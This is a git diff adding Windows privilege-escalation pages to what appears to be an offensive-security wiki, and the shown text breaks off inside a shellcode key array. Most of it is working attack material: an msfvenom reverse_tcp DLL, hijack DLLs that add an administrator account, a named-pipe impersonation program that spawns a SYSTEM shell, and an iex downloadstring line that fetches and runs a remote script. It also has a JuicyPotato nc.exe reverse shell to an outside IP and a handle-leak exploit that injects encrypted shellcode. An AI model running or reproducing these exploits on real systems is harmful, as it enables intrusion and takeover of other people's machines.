+In case you find an exploitable scenario one of the most important things to successfully exploit it would be to **create a dll that exports at least all the functions the executable will import from it**. Anyway, note that Dll Hijacking comes handy in order to [escalate from Medium Integrity level to High **\(bypassing UAC\)**](../credentials.md#uac) or from[ **High Integrity to SYSTEM**](./#from-high-integrity-to-system)**.** You can find an example of **how to create a valid dll** inside this dll hijacking study focused on dll hijacking for execution: [**https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows**](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows)**.**  
+Moreover, in the **next sectio**n you can find some **basic dll codes** that might be useful as **templates** or to create a **dll with non required functions exported**.
+
+## **Creating and compiling Dlls**
+
+### **Meterpreter**
+
+```bash
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
+```
+
+### Your own
+
+Note that in several cases the Dll that you compile must **export several functions** that are going to be loaded by the victim process, if these functions doesn't exist the **binary won't be able to load** them and the **exploit will fail**.
+
+```c
+// Tested in Win10
+// i686-w64-mingw32-g++ dll.c -lws2_32 -o srrstr.dll -shared
+#include <windows.h>
+BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
+    switch(dwReason){
+        case DLL_PROCESS_ATTACH:
+            system("whoami > C:\\users\\username\\whoami.txt");
+            WinExec("calc.exe", 0); //This doesn't accept redirections like system
+            break;
+        case DLL_PROCESS_DETACH:
+            break;
+        case DLL_THREAD_ATTACH:
+            break;
+        case DLL_THREAD_DETACH:
+            break;
+    }
+    return TRUE;
+}
+```
+
+```c
+// For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
+// For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
+
+#include <windows.h>
+BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
+    if (dwReason == DLL_PROCESS_ATTACH){
+        system("cmd.exe /k net localgroup administrators user /add");
+        ExitProcess(0);
+    }
+    return TRUE;
+}
+```
+
+```c
+//x86_64-w64-mingw32-g++ -c -DBUILDING_EXAMPLE_DLL main.cpp
+//x86_64-w64-mingw32-g++ -shared -o main.dll main.o -Wl,--out-implib,main.a
+
+#include <windows.h>
+
+int owned()
+{
+  WinExec("cmd.exe /c net user cybervaca Password01 ; net localgroup administrators cybervaca /add", 0);
+  exit(0);
+  return 0;
+}
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
+{
+  owned();
+  return 0;
+}
+```
+
+```c
+//Another possible DLL
+// i686-w64-mingw32-gcc windows_dll.c -shared -lws2_32 -o output.dll
+
+#include<windows.h>
+#include<stdlib.h>
+#include<stdio.h>
+
+void Entry (){ //Default function that is executed when the DLL is loaded
+    system("cmd");
+}
+
+BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
+    switch (ul_reason_for_call){
+        case DLL_PROCESS_ATTACH:
+            CreateThread(0,0, (LPTHREAD_START_ROUTINE)Entry,0,0,0);
+            break;
+        case DLL_THREAD_ATTACH:
+        case DLL_THREAD_DETACH:
+        case DLL_PROCESS_DEATCH:
+            break;
+    }
+    return TRUE;
+}
+```
+
diff --git a/windows/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md b/windows/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md
new file mode 100644
index 00000000..f85ab290
--- /dev/null
+++ b/windows/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md
@@ -0,0 +1,116 @@
+# From High Integrity to SYSTEM with Name Pipes
+
+**Code flow:**
+
+1. Create a new Pipe
+2. Create and start a service that will connect to the created pipe and write something. The service code will execute this encoded PS code: `$pipe = new-object System.IO.Pipes.NamedPipeClientStream("piper"); $pipe.Connect(); $sw = new-object System.IO.StreamWriter($pipe); $sw.WriteLine("Go"); $sw.Dispose();`
+3. The service receive the data from the client in the pipe, call ImpersonateNamedPipeClient and waits for the service to finish
+4.  Finally, uses the token obtained from the service to spawn a new _cmd.exe_
+
+```c
+#include <windows.h>
+#include <time.h>
+
+#pragma comment (lib, "advapi32")
+#pragma comment (lib, "kernel32")
+
+#define PIPESRV "PiperSrv"
+#define MESSAGE_SIZE 512
+
+int ServiceGo(void) {
+
+	SC_HANDLE scManager;
+	SC_HANDLE scService;
+
+	scManager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
+
+	if (scManager == NULL) {
+		return FALSE;
+	}
+
+	// create Piper service
+	scService = CreateServiceA(scManager, PIPESRV, PIPESRV, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, 
+							SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL,
+							"C:\\Windows\\\System32\\cmd.exe /rpowershell.exe -EncodedCommand JABwAGkAcABlACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFAAaQBwAGUAcwAuAE4AYQBtAGUAZABQAGkAcABlAEMAbABpAGUAbgB0AFMAdAByAGUAYQBtACgAIgBwAGkAcABlAHIAIgApADsAIAAkAHAAaQBwAGUALgBDAG8AbgBuAGUAYwB0ACgAKQA7ACAAJABzAHcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AVwByAGkAdABlAHIAKAAkAHAAaQBwAGUAKQA7ACAAJABzAHcALgBXAHIAaQB0AGUATABpAG4AZQAoACIARwBvACIAKQA7ACAAJABzAHcALgBEAGkAcwBwAG8AcwBlACgAKQA7AA==", 
+							NULL, NULL, NULL, NULL, NULL);
+
+	if (scService == NULL) {
+		//printf("[!] CreateServiceA() failed: [%d]\n", GetLastError());
+		return FALSE;
+	}
+	
+	// launch it
+	StartService(scService, 0, NULL);
+
+	// wait a bit and then cleanup
+	Sleep(10000);
+	DeleteService(scService);
+
+	CloseServiceHandle(scService);
+	CloseServiceHandle(scManager);	
+}
+
+int main() {
+
+	LPCWSTR sPipeName = "\\\\.\\pipe\\piper";
+	HANDLE hSrvPipe;
+	HANDLE th;
+	BOOL bPipeConn;
+	char pPipeBuf[MESSAGE_SIZE];
+	DWORD dBRead = 0;
+
+	HANDLE hImpToken;
+	HANDLE hNewToken;
+	STARTUPINFOA si;
+	PROCESS_INFORMATION pi;
+
+	// open pipe
+	hSrvPipe = CreateNamedPipeA(sPipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_WAIT, 
+								PIPE_UNLIMITED_INSTANCES, 1024, 1024, 0, NULL);
+	
+	// create and run service
+	th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) ServiceGo, NULL, 0, 0);
+	
+	// wait for the connection from the service
+	bPipeConn = ConnectNamedPipe(hSrvPipe, NULL);
+	if (bPipeConn) {
+		ReadFile(hSrvPipe, &pPipeBuf, MESSAGE_SIZE, &dBRead, NULL);
+	
+		// impersonate the service (SYSTEM)
+		if (ImpersonateNamedPipeClient(hSrvPipe) == 0) {
+			return -1;
+		}
+		
+		// wait for the service to cleanup
+		WaitForSingleObject(th, INFINITE);
+		
+		// get a handle to impersonated token
+		if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &hImpToken)) {
+				return -2;
+			} 
+
+		// create new primary token for new process
+		if (!DuplicateTokenEx(hImpToken, TOKEN_ALL_ACCESS, NULL, SecurityDelegation,
+							TokenPrimary, &hNewToken)) {
+				return -4;
+		}
+
+		//Sleep(20000);
+		// spawn cmd.exe as full SYSTEM user
+		ZeroMemory(&si, sizeof(si));
+		si.cb = sizeof(si);
+		ZeroMemory(&pi, sizeof(pi));
+		if (!CreateProcessWithTokenW(hNewToken, LOGON_NETCREDENTIALS_ONLY, NULL, L"cmd.exe", 
+									NULL, NULL, NULL, (LPSTARTUPINFOW)&si, &pi)) {
+			return -5;
+		}
+		
+		// revert back to original security context
+		RevertToSelf();
+	
+	}
+
+	return 0;
+}
+```
+
diff --git a/windows/windows-local-privilege-escalation/jaws.md b/windows/windows-local-privilege-escalation/jaws.md
new file mode 100644
index 00000000..4fa148a3
--- /dev/null
+++ b/windows/windows-local-privilege-escalation/jaws.md
@@ -0,0 +1,33 @@
+# JAWS
+
+
+
+## Start
+
+```text
+iex(New-Object net.WebClient).downloadstring("https://raw.githubusercontent.com/411Hall/JAWS
+/master/jaws-enum.ps1")
+```
+
+## Info recopilation
+
+It does not only check for privilege escalation missconfiguration, but it also gathers information about the current situation.
+
+* [x] Users & groups
+* [x] Network \(interfaces, arp, ports, firewall \(lot of output\), **hosts**\)
+* [x] Processes
+* [x] Scheduled Tasks \(lot of output\)
+* [x] Services \(lot of output\)
+* [x] Installed Software, Program folders
+* [x] Patches
+* [x] Drives
+* [x] Last modified files
+
+## Checks
+
+* [x] Files and folders with Full Control
+* [x] Unquoted Service Paths
+* [x] Potentially interesting files
+* [x] System files with password
+* [x] Stored credentials
+
diff --git a/windows/windows-local-privilege-escalation/juicypotato.md b/windows/windows-local-privilege-escalation/juicypotato.md
new file mode 100644
index 00000000..131cb4b2
--- /dev/null
+++ b/windows/windows-local-privilege-escalation/juicypotato.md
@@ -0,0 +1,111 @@
+# JuicyPotato
+
+#### You can download juicypotato from [https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts](https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts)
+
+## Juicy Potato \(abusing the golden privileges\) <a id="juicy-potato-abusing-the-golden-privileges"></a>
+
+_A sugared version of_ [_RottenPotatoNG_](https://github.com/breenmachine/RottenPotatoNG)_, with a bit of juice, i.e. **another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM**_
+
+### Summary <a id="summary"></a>
+
+[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) and its [variants](https://github.com/decoder-it/lonelypotato) leverages the privilege escalation chain based on [`BITS`](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799%28v=vs.85%29.aspx) [service](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126) having the MiTM listener on `127.0.0.1:6666` and when you have `SeImpersonate` or `SeAssignPrimaryToken` privileges. During a Windows build review we found a setup where `BITS` was intentionally disabled and port `6666` was taken.
+
+We decided to weaponize [RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG): **Say hello to Juicy Potato**.
+
+> For the theory, see [Rotten Potato - Privilege Escalation from Service Accounts to SYSTEM](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) and follow the chain of links and references.
+
+We discovered that, other than `BITS` there are a several COM servers we can abuse. They just need to:
+
+1. be instantiable by the current user, normally a “service user” which has impersonation privileges
+2. implement the `IMarshal` interface
+3. run as an elevated user \(SYSTEM, Administrator, …\)
+
+After some testing we obtained and tested an extensive list of [interesting CLSID’s](http://ohpe.it/juicy-potato/CLSID/) on several Windows versions.
+
+### Juicy details <a id="juicy-details"></a>
+
+JuicyPotato allows you to:
+
+* **Target CLSID**  _pick any CLSID you want._ [_Here_](http://ohpe.it/juicy-potato/CLSID/) _you can find the list organized by OS._
+* **COM Listening port**  _define COM listening port you prefer \(instead of the marshalled hardcoded 6666\)_
+* **COM Listening IP address**  _bind the server on any IP_
+* **Process creation mode**  _depending on the impersonated user’s privileges you can choose from:_
+  * `CreateProcessWithToken` \(needs `SeImpersonate`\)
+  * `CreateProcessAsUser` \(needs `SeAssignPrimaryToken`\)
+  * `both`
+* **Process to launch**  _launch an executable or script if the exploitation succeeds_
+* **Process Argument**  _customize the launched process arguments_
+* **RPC Server address**  _for a stealthy approach you can authenticate to an external RPC server_
+* **RPC Server port**  _useful if you want to authenticate to an external server and firewall is blocking port `135`…_
+* **TEST mode**  _mainly for testing purposes, i.e. testing CLSIDs. It creates the DCOM and prints the user of token. See_ [_here for testing_](http://ohpe.it/juicy-potato/Test/)
+
+### Usage <a id="usage"></a>
+
+```text
+T:\>JuicyPotato.exe
+JuicyPotato v0.1
+
+Mandatory args:
+-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
+-p <program>: program to launch
+-l <port>: COM server listen port
+
+
+Optional args:
+-m <ip>: COM server listen address (default 127.0.0.1)
+-a <argument>: command line argument to pass to program (default NULL)
+-k <ip>: RPC server ip address (default 127.0.0.1)
+-n <port>: RPC server listen port (default 135)
+```
+
+### Final thoughts <a id="final-thoughts"></a>
+
+If the user has `SeImpersonate` or `SeAssignPrimaryToken` privileges then you are **SYSTEM**.
+
+It’s nearly impossible to prevent the abuse of all these COM Servers. You could think about modifying the permissions of these objects via `DCOMCNFG` but good luck, this is gonna be challenging.
+
+The actual solution is to protect sensitive accounts and applications which run under the `* SERVICE` accounts. Stopping `DCOM` would certainly inhibit this exploit but could have a serious impact on the underlying OS.
+
+From: [http://ohpe.it/juicy-potato/](http://ohpe.it/juicy-potato/)
+
+## Examples
+
+### Get a nc.exe reverse shell
+
+```text
+c:\Users\Public>JuicyPotato -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 10.10.10.12 443" -t *
+JuicyPotato -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 10.10.10.12 443" -t *                                                                                
+Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
+......
+[+] authresult 0
+{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
+
+[+] CreateProcessWithTokenW OK
+
+c:\Users\Public>
+```
+
+### Launch a new CMD \(if you have RDP access\)
+
+![](../../.gitbook/assets/image%20%2860%29.png)
+
+## CLSID Problems
+
+If you can't find **any working CLSID** you should visit this page:
+
+{% embed url="https://ohpe.it/juicy-potato/CLSID/" %}
+
+There you can **find** some **CLSID that you could** use instead of the default one to privesc.
+
+**You could also try to find other working CLSID.**
+
+### **Checking CLSIDs**
+
+First, you will need some executables apart from juicypotato.exe.
+
+Download [Join-Object.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1) and load it into your PS session, and download and execute [GetCLSID.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1). That script will create a list of possible CLSIDs to test.
+
+Then download [test\_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat)\(change the path to the CLSID list and to the juicypotato executable\) and execute it. It will start trying every CLSID, and **when the port number changes, it will mean that the CLSID worked**.
+
+**Check** the working CLSIDs **using the parameter -c**
+
diff --git a/windows/windows-local-privilege-escalation/leaked-handle-exploitation.md b/windows/windows-local-privilege-escalation/leaked-handle-exploitation.md
new file mode 100644
index 00000000..1c76b7f4
--- /dev/null
+++ b/windows/windows-local-privilege-escalation/leaked-handle-exploitation.md
@@ -0,0 +1,603 @@
+# Leaked Handle Exploitation
+
+Imagine that **a process running as SYSTEM open a new process** \(`OpenProcess()`\) with **full access**. The same process **also create a new process** \(`CreateProcess()`\) **with low privileges but inheriting all the open handles of the main process**.  
+Then, if you have **full access to the low privileged process**, you can grab the **open handle to the privileged process created** with `OpenProcess()` and **inject a shellcode**.
+
+**The code of this example was shared by an anonymous person.**
+
+## Vulnerable Example
+
+For example, the following code belongs to a **Windows service** that would be vulnerable. The vulnerable code of this service binary is located inside the **`Exploit`** function. This function is starts **creating a new handle process with full access**. Then, it's **creating a low privileged process** \(by copying the low privileged token of _explorer.exe_\) executing _C:\users\username\desktop\client.exe_. The **vulnerability resides in the fact it's creating the low privileged process with `bInheritHandles` as `TRUE`**.
+
+Therefore, this low privileges process is able to grab the handle of the high privileged process crated first and inject and execute a shellcode \(see next section\).
+
+```c
+#include <windows.h>
+#include <tlhelp32.h>
+#include <tchar.h>
+#pragma comment (lib, "advapi32")
+
+TCHAR* serviceName = TEXT("HandleLeakSrv");
+SERVICE_STATUS serviceStatus;
+SERVICE_STATUS_HANDLE serviceStatusHandle = 0;
+HANDLE stopServiceEvent = 0;
+
+
+//Find PID of a proces from its name
+int FindTarget(const char *procname) {
+
+	HANDLE hProcSnap;
+	PROCESSENTRY32 pe32;
+	int pid = 0;
+			
+	hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+	if (INVALID_HANDLE_VALUE == hProcSnap) return 0;
+			
+	pe32.dwSize = sizeof(PROCESSENTRY32); 
+			
+	if (!Process32First(hProcSnap, &pe32)) {
+			CloseHandle(hProcSnap);
+			return 0;
+	}
+			
+	while (Process32Next(hProcSnap, &pe32)) {
+			if (lstrcmpiA(procname, pe32.szExeFile) == 0) {
+					pid = pe32.th32ProcessID;
+					break;
+			}
+	}
+			
+	CloseHandle(hProcSnap);
+			
+	return pid;
+}
+
+
+int Exploit(void) {
+	
+  STARTUPINFOA si;
+  PROCESS_INFORMATION pi;
+	int pid = 0;
+  HANDLE hUserToken;
+	HANDLE hUserProc;
+  HANDLE hProc;
+
+	// open a handle to itself (privileged process) - this gets leaked!
+  hProc = OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId());
+
+	// get PID of user low privileged process
+	if ( pid = FindTarget("explorer.exe") ) 
+		hUserProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
+	else
+		return -1;
+	
+	// extract low privilege token from a user's process
+    if (!OpenProcessToken(hUserProc, TOKEN_ALL_ACCESS, &hUserToken)) {
+        CloseHandle(hUserProc);
+        return -1;
+    }
+
+	// spawn a child process with low privs and leaked handle
+    ZeroMemory(&si, sizeof(si));
+    si.cb = sizeof(si);
+    ZeroMemory(&pi, sizeof(pi));
+    CreateProcessAsUserA(hUserToken, "C:\\users\\username\\Desktop\\client.exe", 
+						NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
+
+	CloseHandle(hProc);
+	CloseHandle(hUserProc);
+    return 0;
+}
+
+
+
+void WINAPI ServiceControlHandler( DWORD controlCode ) {
+	switch ( controlCode ) {
+		case SERVICE_CONTROL_SHUTDOWN:
+		case SERVICE_CONTROL_STOP:
+			serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
+			SetServiceStatus( serviceStatusHandle, &serviceStatus );
+
+			SetEvent( stopServiceEvent );
+			return;
+
+		case SERVICE_CONTROL_PAUSE:
+			break;
+
+		case SERVICE_CONTROL_CONTINUE:
+			break;
+
+		case SERVICE_CONTROL_INTERROGATE:
+			break;
+
+		default:
+			break;
+	}
+	SetServiceStatus( serviceStatusHandle, &serviceStatus );
+}
+
+void WINAPI ServiceMain( DWORD argc, TCHAR* argv[] ) {
+	// initialise service status
+	serviceStatus.dwServiceType = SERVICE_WIN32;
+	serviceStatus.dwCurrentState = SERVICE_STOPPED;
+	serviceStatus.dwControlsAccepted = 0;
+	serviceStatus.dwWin32ExitCode = NO_ERROR;
+	serviceStatus.dwServiceSpecificExitCode = NO_ERROR;
+	serviceStatus.dwCheckPoint = 0;
+	serviceStatus.dwWaitHint = 0;
+
+	serviceStatusHandle = RegisterServiceCtrlHandler( serviceName, ServiceControlHandler );
+
+	if ( serviceStatusHandle ) {
+		// service is starting
+		serviceStatus.dwCurrentState = SERVICE_START_PENDING;
+		SetServiceStatus( serviceStatusHandle, &serviceStatus );
+
+		// do initialisation here
+		stopServiceEvent = CreateEvent( 0, FALSE, FALSE, 0 );
+
+		// running
+		serviceStatus.dwControlsAccepted |= (SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);
+		serviceStatus.dwCurrentState = SERVICE_RUNNING;
+		SetServiceStatus( serviceStatusHandle, &serviceStatus );
+
+		Exploit();
+		WaitForSingleObject( stopServiceEvent, -1 );
+
+		// service was stopped
+		serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
+		SetServiceStatus( serviceStatusHandle, &serviceStatus );
+
+		// do cleanup here
+		CloseHandle( stopServiceEvent );
+		stopServiceEvent = 0;
+
+		// service is now stopped
+		serviceStatus.dwControlsAccepted &= ~(SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);
+		serviceStatus.dwCurrentState = SERVICE_STOPPED;
+		SetServiceStatus( serviceStatusHandle, &serviceStatus );
+	}
+}
+
+
+void InstallService() {
+	SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CREATE_SERVICE );
+
+	if ( serviceControlManager ) {
+		TCHAR path[ _MAX_PATH + 1 ];
+		if ( GetModuleFileName( 0, path, sizeof(path)/sizeof(path[0]) ) > 0 ) {
+			SC_HANDLE service = CreateService( serviceControlManager,
+							serviceName, serviceName,
+							SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,
+							SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, path,
+							0, 0, 0, 0, 0 );
+			if ( service )
+				CloseServiceHandle( service );
+		}
+		CloseServiceHandle( serviceControlManager );
+	}
+}
+
+void UninstallService() {
+	SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CONNECT );
+
+	if ( serviceControlManager ) {
+		SC_HANDLE service = OpenService( serviceControlManager,
+			serviceName, SERVICE_QUERY_STATUS | DELETE );
+		if ( service ) {
+			SERVICE_STATUS serviceStatus;
+			if ( QueryServiceStatus( service, &serviceStatus ) ) {
+				if ( serviceStatus.dwCurrentState == SERVICE_STOPPED )
+					DeleteService( service );
+			}
+			CloseServiceHandle( service );
+		}
+		CloseServiceHandle( serviceControlManager );
+	}
+}
+
+int _tmain( int argc, TCHAR* argv[] )
+{
+	if ( argc > 1 && lstrcmpi( argv[1], TEXT("install") ) == 0 ) {
+		InstallService();
+	}
+	else if ( argc > 1 && lstrcmpi( argv[1], TEXT("uninstall") ) == 0 ) {
+		UninstallService();
+	}
+	else  {
+		SERVICE_TABLE_ENTRY serviceTable[] = {
+			{ serviceName, ServiceMain },
+			{ 0, 0 }
+		};
+	
+		StartServiceCtrlDispatcher( serviceTable );
+	}	
+
+	return 0;
+}
+```
+
+## Exploit Example 1
+
+{% hint style="info" %}
+In a real scenario you probably **won't be able to control the binary** that is going to be executed by the vulnerable code \(_C:\users\username\desktop\client.exe_ in this case\). Probably you will **compromise a process and you will need to look if you can access any vulnerable handle of any privileged process**.
+{% endhint %}
+
+In this example you can find the code of a possible exploit for _C:\users\username\desktop\client.exe_.  
+The most interesting part of this code is located in `GetVulnProcHandle`. This function will **start fetching all the handles**, then it will **check if any of them belongs to the same PID** and if the handle belongs to a **process**. If all these requirements are completed \(an accessible open process handle is found\) , it try to **inject and execute a shellcode abusing the handle of the process**.   
+The injection of the shellcode is done inside the **`Inject`** function and it will just **write the shellcode inside the privileged process and create a thread inside the same process** to execute the shellcode\).
+
+```c
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <time.h>
+#include <wincrypt.h>
+#include <psapi.h>
+#include <tchar.h>
+#include <tlhelp32.h>
+#include "client.h"
+#pragma comment (lib, "crypt32.lib")
+#pragma comment (lib, "advapi32")
+#pragma comment (lib, "kernel32")
+
+
+int AESDecrypt(char * payload, unsigned int payload_len, char * key, size_t keylen) {
+        HCRYPTPROV hProv;
+        HCRYPTHASH hHash;
+        HCRYPTKEY hKey;
+
+        if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
+                return -1;
+        }
+        if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
+                return -1;
+        }
+        if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)){
+                return -1;              
+        }
+        if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
+                return -1;
+        }
+        
+        if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, payload, &payload_len)){
+                return -1;
+        }
+        
+        CryptReleaseContext(hProv, 0);
+        CryptDestroyHash(hHash);
+        CryptDestroyKey(hKey);
+        
+        return 0;
+}
+
+
+HANDLE GetVulnProcHandle(void) {
+    
+	ULONG handleInfoSize = 0x10000;
+    NTSTATUS status;
+    PSYSTEM_HANDLE_INFORMATION phHandleInfo = (PSYSTEM_HANDLE_INFORMATION) malloc(handleInfoSize);
+	HANDLE hProc = NULL;
+	POBJECT_TYPE_INFORMATION objectTypeInfo;
+	PVOID objectNameInfo;
+	UNICODE_STRING objectName;
+    ULONG returnLength;
+    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
+    DWORD dwOwnPID = GetCurrentProcessId();
+	
+    pNtQuerySystemInformation = GetProcAddress(hNtdll, "NtQuerySystemInformation");
+    pNtDuplicateObject = GetProcAddress(hNtdll, "NtDuplicateObject");
+    pNtQueryObject = GetProcAddress(hNtdll, "NtQueryObject");
+    pRtlEqualUnicodeString = GetProcAddress(hNtdll, "RtlEqualUnicodeString");
+    pRtlInitUnicodeString = GetProcAddress(hNtdll, "RtlInitUnicodeString");
+
+    printf("[+] Grabbing handles...");
+
+    while ((status = pNtQuerySystemInformation( SystemHandleInformation, phHandleInfo, handleInfoSize,
+											NULL )) == STATUS_INFO_LENGTH_MISMATCH)
+        phHandleInfo = (PSYSTEM_HANDLE_INFORMATION) realloc(phHandleInfo, handleInfoSize *= 2);
+
+    if (status != STATUS_SUCCESS)
+    {
+        printf("[!] NtQuerySystemInformation failed!\n");
+        return 0;
+    }
+
+    printf("done.\n[+] Fetched %d handles.\n", phHandleInfo->NumberOfHandles);
+
+    // iterate handles until we find the privileged process handle
+    for (int i = 0; i < phHandleInfo->NumberOfHandles; ++i)
+    {
+        SYSTEM_HANDLE_TABLE_ENTRY_INFO handle = phHandleInfo->Handles[i];
+
+        // Check if this handle belongs to our own process
+        if (handle.UniqueProcessId != dwOwnPID)
+            continue;
+
+        objectTypeInfo = (POBJECT_TYPE_INFORMATION) malloc(0x1000);
+        if (pNtQueryObject( (HANDLE) handle.HandleValue,
+						ObjectTypeInformation,
+						objectTypeInfo,
+						0x1000,
+						NULL ) != STATUS_SUCCESS)
+            continue;
+
+		// skip some objects to avoid getting stuck
+		// see: https://github.com/adamdriscoll/PoshInternals/issues/7
+        if (handle.GrantedAccess == 0x0012019f
+			&& handle.GrantedAccess != 0x00120189
+			&& handle.GrantedAccess != 0x120089
+			&& handle.GrantedAccess != 0x1A019F ) {
+            free(objectTypeInfo);
+            continue;
+        }
+
+		// get object name information
+        objectNameInfo = malloc(0x1000);
+        if (pNtQueryObject( (HANDLE) handle.HandleValue,
+						ObjectNameInformation,
+						objectNameInfo,
+						0x1000,
+						&returnLength ) != STATUS_SUCCESS) {
+            
+			// adjust the size of a returned object and query again
+			objectNameInfo = realloc(objectNameInfo, returnLength);
+            if (pNtQueryObject( (HANDLE) handle.HandleValue,
+							ObjectNameInformation,
+							objectNameInfo,
+							returnLength,
+							NULL ) != STATUS_SUCCESS) {
+                free(objectTypeInfo);
+                free(objectNameInfo);
+                continue;
+            }
+        }
+
+        // check if we've got a process object
+        objectName = *(PUNICODE_STRING) objectNameInfo;
+        UNICODE_STRING pProcess;
+
+        pRtlInitUnicodeString(&pProcess, L"Process");
+        if (pRtlEqualUnicodeString(&objectTypeInfo->TypeName, &pProcess, TRUE)) {
+            printf("[+] Found process handle (%x)\n", handle.HandleValue);
+            hProc = (HANDLE) handle.HandleValue;
+			free(objectTypeInfo);
+			free(objectNameInfo);
+			break;
+        }
+        else
+            continue;
+        
+        free(objectTypeInfo);
+        free(objectNameInfo);
+    }
+	
+	return hProc;
+} 
+
+int Inject(HANDLE hProc, unsigned char * payload, unsigned int payload_len) {
+	
+	LPVOID pRemoteCode = NULL;
+    HANDLE hThread = NULL;
+	BOOL bStatus = FALSE;
+
+	pVirtualAllocEx = GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualAllocEx");
+	pWriteProcessMemory = GetProcAddress(GetModuleHandle("kernel32.dll"), "WriteProcessMemory");
+	pRtlCreateUserThread = GetProcAddress(GetModuleHandle("ntdll.dll"), "RtlCreateUserThread");
+	
+	pRemoteCode = pVirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);
+	pWriteProcessMemory(hProc, pRemoteCode, (PVOID)payload, (SIZE_T)payload_len, (SIZE_T *)NULL);
+	
+    bStatus = (BOOL) pRtlCreateUserThread(hProc, NULL, 0, 0, 0, 0, pRemoteCode, NULL, &hThread, NULL);
+	if (bStatus != FALSE) {
+			WaitForSingleObject(hThread, -1);
+			CloseHandle(hThread);
+			return 0;
+	}
+	else
+		return -1;
+}
+
+int main(int argc, char **argv) {
+	
+	int pid = 0;
+	HANDLE hProc = NULL;
+
+	// AES encrypted shellcode spawning notepad.exe (ExitThread)
+	char key[] = { 0x49, 0xbc, 0xa5, 0x1d, 0xa7, 0x3d, 0xd6, 0x0, 0xee, 0x2, 0x29, 0x3e, 0x9b, 0xb2, 0x8a, 0x69 };
